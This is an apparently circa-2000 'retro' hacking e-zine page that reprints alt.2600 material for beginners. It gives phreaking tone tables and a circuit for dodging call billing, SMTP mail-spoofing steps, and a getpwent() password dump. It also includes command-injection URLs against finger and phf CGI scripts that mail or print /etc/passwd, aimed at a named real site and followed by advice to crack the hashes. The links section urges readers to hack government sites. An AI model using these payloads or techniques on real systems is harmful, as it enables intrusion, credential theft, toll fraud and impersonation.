Welcome to the first (and possibly only!) issue of Retro Hacking World. It's an e-zine for the computer underground written as if it's still 1985!
| BUCKY | BITS (primarily Stanford) noun> The bits produced by the CTRL and META shift keys on a Stanford (or Knight) key- board. Rumor has it that the idea for extra bits for characters came from Niklaus Wirth, and that his nick- name was "Bucky." |
| hack | /hak/ noun 1. Originally a quick job that produces what is needed, but not well. 2. The result of that job. |
| phreaking |
/freek'ing/noun
[from `phone phreak'] 1. The art and science of cracking the phone network to make free long-distance calls, for example. 2. By extension, security-cracking in any other context (especially, but not exclusively, on communications networks) |
This issue we look at the fundamentals of phreaking - tones and pulses - both can be used to garner free calls from your local friendly telco :-)
Pulse dialing with the hook switch.
This is a well known method of getting around locks on rotary dial phones and may also be usefull on really stupid COCOT-type private payphones. Old rotary dial phones use loop disconnect signaling. As the dial returns, each click disconnects the line for a few tens of milliseconds. With a bit of practise you can dial numbers by tapping the hook switch. One tap to dial 1. Two taps to dial 2. tens taps to dial a 0.
Blueboxing
Blueboxing trunk lines with the uk died many years ago with the coming of system X.
Some other countrys still have ancient exchange equipment to blue boxing can still be,
and may be exploited by the uk phreak if she can find a way to reach such a countrys phone
system without paying for an international phone call but it defeats the point.
It is still possible to bluebox some connections from the UK where a call passes from one
phone company to another and in-band signalling is used. C5 or R2 signalling my be used
for compatability even if both phone companys have more modern equipment.
TONE MATRIX TO USE ONCE CONNECTED
700: 1 : 2 : 4 : 7 : 11 :
900: + : 3 : 5 : 8 : 12 :
1100: + : + : 6 : 9 : KP :
1300: + : + : + : 10 : KP2 :
1500: + : + : + : + : ST :
900 :1100 :1300 :1500 : 1700 :
USE KP (1700+1100) TO START A CALL AND
ST (1500+1700) TO STOP. USE 2600 HZ TO
CONNECT/DISCONNECT.
Current Limit
Heres's an old one that might still work on a few exchanges.
This is the circuit for a device you can attach in line with your telephone
which avoids people phoning you being billed for the call.
This circuit fools the local exchange into thinking the phone is still
ringing although you have answered it. It limits the current draw from the
phone line to a level below that needed to activate a relay in mechanical
exchanges. Use of this circuit often resulted in a crossed line because
the exchange thought the trunk line was free.
Neg. RED ______
o___.___._||5mfd__.____________| |
| | || | | P |
| | / 240 Ohm | H |
| |________o o__/X/_. | O |
P.B. o Norm Free | | N |
> --- | E |
. 6volts----- | |
| --- | |
| | | |
o___._____________________.____|_____|
Pos. GREEN
2600 Tone Circuit
Yes! More ASCII art, I'm afraid. But this classic circuit will produce a tone of 2600 Hz for all your phreaking needs!
+---+---------------------------+
| | |
| V 1k |
| /\/\/-+-/\/\/-+-------------+ |
+-----+ 5k | | | |
| ---|-------|-------|--------|--- | |
pshbtn | o | 8 7 6 5 | | |
switch -+ | | | |
| o ||| 5 5 5 | | |
| ||| TIMER | | |
| | | | |
(+)-----+ | 1 2 3 4 | | |
9 volts ---|-------|-------|--------|--- | |
(-)-----------+ | | | | |
| +---------------------+ |
| 3.3uF | | |
+-->|--------------------+------+
| |
4.7uF \_/ |
--- |
|(+) |
| _____ |
+---| 8ohm |----+
/__SPKR__\
| hacking |
/hak'ing/noun 1. Originally a quick job that produces what is needed, but not well. 2. The result of that job. |
A bit of a mixed bag, here.
Fake E-mail
- Telnet to port 25 of any internet server (eg. telnet site.name.and.address 25)
- Type: HELO (unfortunate, I know, but often needed)
- Type: rcpt to (person to receive fake mail){ENTER}
- Type: mail from (fake name and address){ENTER}
- Type: data{ENTER}
- The first line of the message will be the Subject line
- Enter your letter
- To send letter type a "." on an empty line.
- Then type quit{ENTER}
- This is traceable by any sysadmin ... don't harass people this way.
- If the person receiving the mail uses a shell like elm he/she will not see the telltale fake message warning "Apparently-To:(name)" even if not, most people wouldn't know what it means anyway.
Keyboard stuff
You can generate arbitary ASCII codes on a PC keyboard by holding down ALT on your keyboard and typing a three digit number on the numeric keypad.
This came in handy for hiding files files on computers running DOS in the pre DOS 5 days. Create a directory with an odd charcter in the name and it would prevent most people from getting at your games. ALT 123 appear to be a ohms sysbol on DOS machines and was easy to remember.
Ever wondered what ALT GR is for? Non english keyboards use alt gr as a third shift key. They have three symbols on many of the keys for accentted letters and suchlike. On US and UK keyboards the only key with three characters is usually the one below the escape key. Holding altgr and pressing that keys produces the pipe symbol.
Password shadowing
What is password shadowing? Password shadowing is a security system where the encrypted password field of /etc/passwd is replaced with a special token and the encrypted password is stored in a separate file which is not readable by normal system users. To defeat password shadowing on many (but not all) systems, write a program that uses successive calls to getpwent() to obtain the password file. Example:
#include(from the alt.2600 FAQ)main() { struct passwd *p; while(p=getpwent()) printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd, p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell); }
Hacking from your Web Browser
by Modify of Technophoria
This file will describe several techniques to aquire a password file just by using an ordinary web browser. The information provided will be best described for the beginner hacker, but all hackers should benifit from this information. We will only
cover phf in this file but, feel free to explore other programs in the cgi directory such as nph-test-cgi or test-cgi. And now . . . get comfortable... sit back.... and read.
There are several techniques on what I call "Web Browser Hacking". Many beginners dont know that you cant query a etc/passwd file from your browser and in this chapter I will describe all the ways to aquire a passwd file. First you need to find a box
that is running the cgi-bin/phf file on their system. A great way to find out without trial and error is to go to www.altavista.com and just search on cgi-bin AND perl.exe or cgi-bin AND phf.
Finger box hacking:
Lets say you wanted to break into somewhere like .... hmmmm AOL. The first thing we would do is type in their web site in the URL: Http://www.aol.com. The next thing we would do is add /cgi-bin/finger to the web URL so it would look like this Http:// www.aol.com/cgi-bin/finger. If the finger gateway is operational a box should appear for you to enter the name you want to finger. If it is operational you have a chance to receive the etc/passwd file. Next thing you will probably want to do is search for a mailto on the web page... just scan the page for any mailto refs. Go back to the finger box and type in this query...... nobody@nowhere.org ; /bin/mail me@junk.org < etc/passwd ...this string takes nobody and emails the passwd file to your email address. If this works you now have the etc/passwd file in your mailbox.... you can now run a crack program against it and have a little fun on their box.
The common cgi-bin/phf query:
This section is for the very beginning hacker (All advanced hackers need not apply) Lets take the same scenerio from the first example except in the URL we would type ... Http://www.aol.com/cgi-bin/phf ... if the phf is operational and has not been removed you should get a series of search boxes on the next page ( ignore these boxs) to your URL you would add this string ?Qalias=x%0a/bin/cat%20/etc/passwd... so the entire string would look like this Http://www.aol.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20 /etc/passwd. This string will print out the etc/passwd file strait to your web browser all you need to do is save it as a file and again run a crack program against it. (This is considering that they are not :*: or :x:).
About the site
This site was created following a discussion about the A4 monitors
at Xerox Parc. Even now, nearly 30 years on, we can only get A4 displays
on handhelds. Progress? Hardly.
So we built a site that would only look
'right' when viewed on an A4 display. Or, failing
that, a monitor turned onto its side!
For content we chose a 'hacking' theme with old news. This
was for two reasons,
1) a little retro-chic
2) we wouldn't have to worry about compromising system security since
any flaws should have been fixed by now :-)
It was incorporated in the 'Blue Dust' think tank in September 2000.
Why?
We had too much time on our hands! Any questions?
Credits
The site was conceived by Spider & Bob Smith
Original Graphics by Bob Smith
Coding and graphics by Spider
Original articles by Bob Smith
Other articles from alt.2600
Site design and production ©2000. All Rights Reserved
E-mail
spider@BlueDust.com
This site was concieved, designed, coded, drawn, produced, editted, re-edittable and generally fussed over by us two!
Links - 2 Learn
Try out these links for the latest news, best interviews and interesting features.
2600 - Speaks for itself
2600 London - The local group of both authors
Phrack - How many hours have I spent reading this?
CCC - Germanys Chaos Computer Club
And of course, BugTraq, et al...
Links - 2 Hack
Prove your metle by hacking these sites. We do not authorise or condone this
action, of course!
Nasa
The Pentagon
The Whitehouse
Micro$oft
(sorry, the last one's already been done :-)
Links - 2 Relax
Kick back in pipe and slippers with these URLs!
Freshmeat
Star Wars
TrekGuide.com
Brickshelf.com
Links - 2 Get
Download sites for useful (and not so useful) stuff.
Debian.org
tucows.com
jumbo.com
linux.org.uk